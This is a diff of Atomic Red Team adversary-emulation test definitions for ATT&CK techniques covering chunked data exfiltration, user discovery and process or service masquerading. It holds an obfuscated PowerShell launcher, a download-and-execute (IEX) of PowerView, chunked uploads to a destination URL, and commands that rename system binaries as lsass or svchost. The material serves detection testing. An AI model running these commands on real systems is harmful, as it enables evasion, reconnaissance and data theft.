+  auto_generated_guid: 6683baf0-6e77-4f58-b114-814184ea8150
+  description: |
+    Spawns a child PowerShell process using character array obfuscation. 
+    Both the PowerShell binary name and executed command are constructed 
+    from ASCII values at runtime to evade string-based detection.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $ps = [char[]](112,111,119,101,114,115,104,101,108,108)
+      $cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
+      & (-join $ps) "-Command" (-join $cmd)
+    cleanup_command: |
+      taskkill /f /im calculator.exe >nul 2>nul
+      taskkill /f /im CalculatorApp.exe >nul 2>nul
+    name: powershell
+
@@ -1,93 +1,77 @@
 # T1030 - Data Transfer Size Limits
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1030)
-<blockquote>

-An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
+## Description from ATT&CK

-</blockquote>
+> An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
+
+[Source](https://attack.mitre.org/techniques/T1030)

 ## Atomic Tests

- [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)
+- [Atomic Test #1: Data Transfer Size Limits](#atomic-test-1-data-transfer-size-limits)
+- [Atomic Test #2: Network-Based Data Transfer in Small Chunks](#atomic-test-2-network-based-data-transfer-in-small-chunks)

- [Atomic Test #2 - Network-Based Data Transfer in Small Chunks](#atomic-test-2---network-based-data-transfer-in-small-chunks)
+### Atomic Test #1: Data Transfer Size Limits

-
-<br/>
-
-## Atomic Test #1 - Data Transfer Size Limits
 Take a file/directory, split it into 5Mb chunks

 **Supported Platforms:** macOS, Linux

+**auto_generated_guid:** `ab936c51-10f4-46ce-9144-e02137b2016a`

-**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | File name | path | T1030_urandom|
 | folder_path | Path where the test creates artifacts | path | /tmp/T1030|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 cd #{folder_path}; split -b 5000000 #{file_name}
 ls -l #{folder_path}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: The file must exist for the test to run.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1
 ```

+### Atomic Test #2: Network-Based Data Transfer in Small Chunks

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Network-Based Data Transfer in Small Chunks
 Simulate transferring data over a network in small chunks to evade detection.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `f0287b58-f4bc-40f6-87eb-692e126e7f8f`

-**auto_generated_guid:** f0287b58-f4bc-40f6-87eb-692e126e7f8f
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | source_file_path | Path to the source file to transfer. | path | [User specified]|
 | destination_url | URL of the destination server. | url | http://example.com|
 | chunk_size | Size of each data chunk (in KB). | integer | 1024|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $file = [System.IO.File]::OpenRead(#{source_file_path})
@@ -101,9 +85,3 @@ while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
 $file.Close()
 ```

-
-
-
-
-
-<br/>
@@ -1,35 +1,27 @@
 # T1033 - System Owner/User Discovery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1033)
-<blockquote>

-Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+## Description from ATT&CK

-Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.
+> Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+> 
+> Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.
+> 
+> On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)

-On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1033)

 ## Atomic Tests

- [Atomic Test #1 - System Owner/User Discovery](#atomic-test-1---system-owneruser-discovery)
+- [Atomic Test #1: System Owner/User Discovery](#atomic-test-1-system-owneruser-discovery)
+- [Atomic Test #2: System Owner/User Discovery](#atomic-test-2-system-owneruser-discovery)
+- [Atomic Test #3: Find computers where user has session - Stealth mode (PowerView)](#atomic-test-3-find-computers-where-user-has-session---stealth-mode-powerview)
+- [Atomic Test #4: User Discovery With Env Vars PowerShell Script](#atomic-test-4-user-discovery-with-env-vars-powershell-script)
+- [Atomic Test #5: GetCurrent User with PowerShell Script](#atomic-test-5-getcurrent-user-with-powershell-script)
+- [Atomic Test #6: System Discovery - SocGholish whoami](#atomic-test-6-system-discovery---socgholish-whoami)
+- [Atomic Test #7: System Owner/User Discovery Using Command Prompt](#atomic-test-7-system-owneruser-discovery-using-command-prompt)

- [Atomic Test #2 - System Owner/User Discovery](#atomic-test-2---system-owneruser-discovery)
+### Atomic Test #1: System Owner/User Discovery

- [Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)](#atomic-test-3---find-computers-where-user-has-session---stealth-mode-powerview)
-
- [Atomic Test #4 - User Discovery With Env Vars PowerShell Script](#atomic-test-4---user-discovery-with-env-vars-powershell-script)
-
- [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script)
-
- [Atomic Test #6 - System Discovery - SocGholish whoami](#atomic-test-6---system-discovery---socgholish-whoami)
-
- [Atomic Test #7 - System Owner/User Discovery Using Command Prompt](#atomic-test-7---system-owneruser-discovery-using-command-prompt)
-
-
-<br/>
-
-## Atomic Test #1 - System Owner/User Discovery
 Identify System owner or users on an endpoint.

 Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. 
@@ -37,21 +29,15 @@ Additionally, two files will be written to disk - computers.txt and usernames.tx

 **Supported Platforms:** Windows

+**auto_generated_guid:** `4c4959bf-addf-4b4a-be86-8d09cc1857aa`

-**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of remote computer | string | localhost|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 cmd.exe /C whoami
@@ -64,31 +50,17 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
 ```

+### Atomic Test #2: System Owner/User Discovery

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - System Owner/User Discovery
 Identify System owner or users on an endpoint

 Upon successful execution, sh will stdout list of usernames.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `2a9b677d-a230-44f4-ad86-782df1ef108c`

-**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 users
@@ -96,109 +68,62 @@ w
 who
 ```

+### Atomic Test #3: Find computers where user has session - Stealth mode (PowerView)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)
 Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `29857f27-a36f-4f7e-8084-4557cd6207ca`

-**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
 ```

+### Atomic Test #4: User Discovery With Env Vars PowerShell Script

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - User Discovery With Env Vars PowerShell Script
 Use the PowerShell environment variables to identify the current logged user.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `dcb6cdee-1fb0-4087-8bf8-88cfd136ba51`

-**auto_generated_guid:** dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 [System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
 $env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item -Path .\CurrentactiveUser.txt -Force
 ```
+### Atomic Test #5: GetCurrent User with PowerShell Script

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - GetCurrent User with PowerShell Script
 Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b`

-**auto_generated_guid:** 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 [System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item -Path .\CurrentUserObject.txt -Force
 ```
+### Atomic Test #6: System Discovery - SocGholish whoami

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - System Discovery - SocGholish whoami
 SocGholish performs whoami discovery commands and outputs the results to a tmp file. 
 The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.

@@ -206,21 +131,15 @@ Reference: https://redcanary.com/threat-detection-report/threats/socgholish/

 **Supported Platforms:** Windows

+**auto_generated_guid:** `3d257a03-eb80-41c5-b744-bb37ac7f65c7`

-**auto_generated_guid:** 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_path | Location of output file | string | $env:temp|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $TokenSet = @{
@@ -236,38 +155,26 @@ $file = "rad" + $rad + ".tmp"
 whoami.exe /all >> #{output_path}\$file
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item -Path #{output_path}\rad*.tmp -Force
 ```
+### Atomic Test #7: System Owner/User Discovery Using Command Prompt

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - System Owner/User Discovery Using Command Prompt
 Identify the system owner or current user using native Windows command prompt utilities.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `ba38e193-37a6-4c41-b214-61b33277fe36`

-**auto_generated_guid:** ba38e193-37a6-4c41-b214-61b33277fe36
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file_path | Location of output file. | string | $env:temp|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 set file=#{output_file_path}\user_info_%random%.tmp
@@ -277,13 +184,8 @@ net users >> %file%
 query user >> %file%
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del #{output_file_path}\\user_info_*.tmp
 ```
-
-
-
-
-
-<br/>
@@ -1,243 +1,168 @@
 # T1036.003 - Masquerading: Rename System Utilities
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/003)
-<blockquote>

-Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main Site)(Citation: Huntress Python Malware 2025)(Citation: The DFIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed PSExec) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>).(Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths.(Citation: F-Secure CozyDuke)
+## Description from ATT&CK

-</blockquote>
+> Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main Site)(Citation: Huntress Python Malware 2025)(Citation: The DFIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed PSExec) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>).(Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths.(Citation: F-Secure CozyDuke)
+
+[Source](https://attack.mitre.org/techniques/T1036/003)

 ## Atomic Tests

- [Atomic Test #1 - Masquerading as Windows LSASS process](#atomic-test-1---masquerading-as-windows-lsass-process)
+- [Atomic Test #1: Masquerading as Windows LSASS process](#atomic-test-1-masquerading-as-windows-lsass-process)
+- [Atomic Test #2: Masquerading as FreeBSD or Linux crond process.](#atomic-test-2-masquerading-as-freebsd-or-linux-crond-process)
+- [Atomic Test #3: Masquerading - cscript.exe running as notepad.exe](#atomic-test-3-masquerading---cscriptexe-running-as-notepadexe)
+- [Atomic Test #4: Masquerading - wscript.exe running as svchost.exe](#atomic-test-4-masquerading---wscriptexe-running-as-svchostexe)
+- [Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe](#atomic-test-5-masquerading---powershellexe-running-as-taskhostwexe)
+- [Atomic Test #6: Masquerading - non-windows exe running as windows exe](#atomic-test-6-masquerading---non-windows-exe-running-as-windows-exe)
+- [Atomic Test #7: Masquerading - windows exe running as different windows exe](#atomic-test-7-masquerading---windows-exe-running-as-different-windows-exe)
+- [Atomic Test #8: Malicious process Masquerading as LSM.exe](#atomic-test-8-malicious-process-masquerading-as-lsmexe)

- [Atomic Test #2 - Masquerading as FreeBSD or Linux crond process.](#atomic-test-2---masquerading-as-freebsd-or-linux-crond-process)
+### Atomic Test #1: Masquerading as Windows LSASS process

- [Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe](#atomic-test-3---masquerading---cscriptexe-running-as-notepadexe)
-
- [Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe](#atomic-test-4---masquerading---wscriptexe-running-as-svchostexe)
-
- [Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe](#atomic-test-5---masquerading---powershellexe-running-as-taskhostwexe)
-
- [Atomic Test #6 - Masquerading - non-windows exe running as windows exe](#atomic-test-6---masquerading---non-windows-exe-running-as-windows-exe)
-
- [Atomic Test #7 - Masquerading - windows exe running as different windows exe](#atomic-test-7---masquerading---windows-exe-running-as-different-windows-exe)
-
- [Atomic Test #8 - Malicious process Masquerading as LSM.exe](#atomic-test-8---malicious-process-masquerading-as-lsmexe)
-
-
-<br/>
-
-## Atomic Test #1 - Masquerading as Windows LSASS process
 Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.

 Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5ba5a3d1-cf3c-4499-968a-a93155d1f717`

-**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
 %SystemRoot%\Temp\lsass.exe /B
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
 ```
+### Atomic Test #2: Masquerading as FreeBSD or Linux crond process.

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Masquerading as FreeBSD or Linux crond process.
 Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.

 Upon successful execution, sh is renamed to `crond` and executed.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `a315bfff-7a98-403b-b442-2ea1b255e556`

-**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 cp /bin/sh /tmp/crond;
 echo 'sleep 5' | /tmp/crond
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm /tmp/crond
 ```
+### Atomic Test #3: Masquerading - cscript.exe running as notepad.exe

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe
 Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.

 Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `3a2a578b-0a01-46e4-92e3-62e2859b42f0`

-**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
 cmd.exe /c %APPDATA%\notepad.exe /B
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del /Q /F %APPDATA%\notepad.exe >nul 2>&1
 ```
+### Atomic Test #4: Masquerading - wscript.exe running as svchost.exe

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe
 Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.

 Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder

 **Supported Platforms:** Windows

+**auto_generated_guid:** `24136435-c91a-4ede-9da1-8b284a1c1a23`

-**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
 cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Wscript file to execute must exist on disk
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
 ```

+### Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe
 Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.

 Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa`

-**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
 cmd.exe /K %APPDATA%\taskhostw.exe
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
 ```
+### Atomic Test #6: Masquerading - non-windows exe running as windows exe

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Masquerading - non-windows exe running as windows exe
 Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe

 Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `bc15c13f-d121-4b1f-8c7d-28d95854d086`

-**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
 | inputfile | path of file to copy | path | PathToAtomicsFolder&#92;T1036.003&#92;bin&#92;T1036.003.exe|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 copy "#{inputfile}" #{outputfile}
@@ -246,52 +171,45 @@ catch { $_; exit $_.Exception.HResult}
 Stop-Process -ID $myT1036_003
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item #{outputfile} -Force -ErrorAction Ignore
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{inputfile}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{inputfile}") -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}"
 ```

+### Atomic Test #7: Masquerading - windows exe running as different windows exe

-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Masquerading - windows exe running as different windows exe
 Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c3d24a39-2bfe-4c6a-b064-90cd73896cb0`

-**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
 | inputfile | path of file to copy | path | $env:ComSpec|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 copy "#{inputfile}" #{outputfile}
@@ -299,19 +217,13 @@ $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
 Stop-Process -ID $myT1036_003
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item #{outputfile} -Force -ErrorAction Ignore
 ```
+### Atomic Test #8: Malicious process Masquerading as LSM.exe

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Malicious process Masquerading as LSM.exe
 Detect LSM running from an incorrect directory and an incorrect service account
 This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder.

@@ -319,30 +231,18 @@ Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from

 **Supported Platforms:** Windows

+**auto_generated_guid:** `83810c46-f45e-4485-9ab6-8ed0e9e6ed7f`

-**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 copy C:\Windows\System32\cmd.exe C:\lsm.exe
 C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del C:\T1036.003.txt >nul 2>&1
 del C:\lsm.exe >nul 2>&1
 ```
-
-
-
-
-
-<br/>
@@ -1,112 +1,75 @@
 # T1036.004 - Masquerading: Masquerade Task or Service
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/004)
-<blockquote>

-Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
+## Description from ATT&CK

-Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
+> Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
+> 
+> Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1036/004)

 ## Atomic Tests

- [Atomic Test #1 - Creating W32Time similar named service using schtasks](#atomic-test-1---creating-w32time-similar-named-service-using-schtasks)
+- [Atomic Test #1: Creating W32Time similar named service using schtasks](#atomic-test-1-creating-w32time-similar-named-service-using-schtasks)
+- [Atomic Test #2: Creating W32Time similar named service using sc](#atomic-test-2-creating-w32time-similar-named-service-using-sc)
+- [Atomic Test #3: linux rename /proc/pid/comm using prctl](#atomic-test-3-linux-rename-procpidcomm-using-prctl)
+- [Atomic Test #4: Hiding a malicious process with bind mounts](#atomic-test-4-hiding-a-malicious-process-with-bind-mounts)

- [Atomic Test #2 - Creating W32Time similar named service using sc](#atomic-test-2---creating-w32time-similar-named-service-using-sc)
+### Atomic Test #1: Creating W32Time similar named service using schtasks

- [Atomic Test #3 - linux rename /proc/pid/comm using prctl](#atomic-test-3---linux-rename-procpidcomm-using-prctl)
-
- [Atomic Test #4 - Hiding a malicious process with bind mounts](#atomic-test-4---hiding-a-malicious-process-with-bind-mounts)
-
-
-<br/>
-
-## Atomic Test #1 - Creating W32Time similar named service using schtasks
 Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"

 **Supported Platforms:** Windows

+**auto_generated_guid:** `f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9`

-**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
-
-
-
-
-
-
